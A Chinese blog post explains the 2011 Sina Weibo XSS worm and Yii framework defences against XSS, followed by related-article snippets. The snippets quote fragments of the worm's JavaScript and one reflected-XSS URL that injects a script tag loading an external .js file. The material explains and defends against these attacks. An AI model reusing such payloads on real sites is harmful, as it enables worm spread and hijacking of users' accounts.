xss攻击之新浪微博xss蠕虫

XSS蠕虫攻击剖析
最新推荐文章于 2025-10-09 14:16:07 发布
原创 最新推荐文章于 2025-10-09 14:16:07 发布 · 2.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#yii2防xss攻击 #xss攻击

本文介绍了XSS蠕虫攻击的工作原理,通过一个具体的XSS攻击链接案例来展示这种攻击方式如何利用JavaScript代码进行传播,并提供了Yii框架下防范XSS攻击的方法。

xss蠕虫:通过一个bug,感染其他结构都出现问题

我们根据一段xss攻击链接来看一下:

很显然,javascript代码被解析了,那它原型是什么呢,怎么看

 通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百,所以就形容其xss蠕虫

那如何防范呢,yii框架里提供的有一种方法:

一. 实体编码

下面来看一下代码:

yii框架这个类主要是把html代码进行实体编码,这样,javascript代码就被原样打印出来了

二 . 防范过滤

这也是用的yii自带的一种方法类:

JAVA WEB之XSS漏洞详解及御措施
洛阳泰山的博客
09-06 2682
pom文件依赖 <!--jsoup--> <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.13.1</version> </dependency> 工具类代码
JavaWeb 之 Springboot项目XSS漏洞攻击解决办法
古小龙
07-15 6028
1. 什么是XSS攻击 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击XSS),是目前最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意...
7. xss蠕虫
HWHXY的博客
01-17 1206
layout: post title: 7. xss蠕虫 category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第7篇小文章,内容为某网站的xss蠕虫XSS特征 触发点惊奇的出现在发送文章中,插入图片的地方可以执行js,由于是发布文章(真的没有想到现在还能这种洞,所以说不能自以为然),所以可以造成蠕虫。如下漏洞和代码都是队友林百万 所为,之前没有用过,特此记录一下。可蠕虫的存储型xss,属于高危害。 蠕虫代码 可以直接插入<scr.
XSS蠕虫攻击
iteye_4538的博客
09-22 1392
XSS (cross-site scripting),即跨站脚本攻击,它的本质还是一种“HTML注入”,用户的数据被当成了HTML代码一部分来执行,从而混淆了原本的语义,产生了新的语义。 来看一张某网站遭受XSS攻击后的图片, [img]http://dl2.iteye.com/upload/attachment/0101/3717/a83f235a-329f-30b0-9f85-3aa7...
什么是XSS-跨站脚本攻击?如何XSS
最新发布
fly_enum的博客
10-09 1800
跨站脚本攻击(xss),指攻击者通过篡改网页,嵌入恶意脚本程序,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。
浅谈跨网站脚本攻击(XSS)的手段与范(简析新浪微博XSS攻击事件)
03-04
1.什么是XSS2.XSS攻击手段和目的3.XSS范4.新浪微博攻击事件跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的H
新浪微博XSS攻击事件
TERRY的技术日志
06-29 3724
6月28日20时14分左右开始,新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博消息和私信,并自动关注一位名为hellosamy的用户。  事件的经过线索如下:20:14,开始有大量带
新浪微博XSS攻击代码简要解析
晨光满苑
06-28 2722
 代码下载(来源游侠安全网) /** *使用AJAX创建XMLHttpRequest对象,若不是IE浏览器,使用XMLHttpRequest创建XHR对象, *否则使用ActiveXObject创建XHR对象。 */function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest():
新浪微博2011年6月受到过xss蠕虫攻击简析
如果我年少有为不自卑
10-23 2525
function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP"); } function getappkey(url){ xmlHttp = createXHR(); xm...
XSS跨域攻击讲义
08-19
- **示例**:2011年,中国知名社交媒体平台新浪微博遭遇了一次XSS蠕虫攻击,短短16分钟内就有近3.3万名用户受到影响。这一事件凸显了XSS攻击的威力及其对用户隐私和安全构成的巨大威胁。 #### 二、XSS攻击原理与...
XSS跨域攻击详解:历史、危害与护策略
2011年,国内知名社交媒体“新浪微博”曾遭受XSS蠕虫攻击,短时间内影响了大量用户。XSS攻击的核心在于利用用户的信任,通过恶意URL将攻击代码注入,例如,攻击者可能会在评论或邮件中包含一个看似正常的链接,诱使...
XSS蠕虫&病毒--即将发生的威胁与最好的
05-28
XSS蠕虫&病毒--即将发生的威胁与最好的
新浪微博曾经受到过xss蠕虫攻击
gaisidewangzhan1的博客
05-15 1521
2蠕虫新浪微博曾经受到过xss蠕虫攻击,代码如下[javascript] view plain copyfunction createXHR(){      return window.XMLHttpRequest?      new XMLHttpRequest():      new ActiveXObject("Microsoft.XMLHTTP");  }  function getap...
新浪微博XSS漏洞攻击过程详解
weixin_34294649的博客
07-11 1538
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博和私信,并自动关注一位名为hellosamy的用户。 事件的经过线索如下: 20:14,开始有大量带V...
XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
weixin_34186128的博客
07-11 667
2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木...
XSS-从weibo蠕虫事件学习
weixin_34273479的博客
03-08 184
XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。   Xss的例子(以新浪微博的6.9的hellosamy蠕虫事件为例):  ...
微博中的XSS攻击:一条微博背后的隐秘风险
让每一行代码都有改变世界的力量
03-18 1236
今天,我们就来深入探讨一下,这“被发送”的微博背后,可能隐藏的跨站脚本攻击XSS)及其带来的潜在威胁。跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的网络攻击方式,攻击者通过在目标网站上注入恶意脚本,使得当用户访问该网站时,这些脚本会被用户的浏览器执行,从而窃取用户信息、破坏网站功能或进行其他恶意行为。例如,在微博搜索框中输入包含恶意脚本的内容,如果微博的搜索结果页面未对这些内容进行过滤,而是直接显示在页面上,那么当用户查看搜索结果时,恶意脚本就会被执行。
浅析新浪微博Web蠕虫事件 XSS漏洞
weixin_33716941的博客
07-04 765
  6月28日晚间20时左右,新浪出现了一次比较大的XSS(跨站脚本)漏洞***,"中毒"的微博用户会自动向自己的粉丝发送诸如"建党大业中穿帮的地方"、"个税起征点有望提到4000"、"郭美美事件的一些未注意到的细节"、"3D肉团团高清普通话版种子"等含毒的微博与私信,并自动关注一位名为hellosamy,粉丝点击后会再次中毒,然后形成恶性循环。新浪微博蠕虫爆发仅执续了16分...
新浪微博XSS蠕虫脚本源码讲解
weixin_34267123的博客
04-09 700
主要是因为新浪的广场页面有几个链接对输入参数过滤不严导致的反射性XSS。======================================== 微博XSS漏洞点 weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.****.com/images/t.js%3e%3c/script%3e?type=update 微博XSS...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值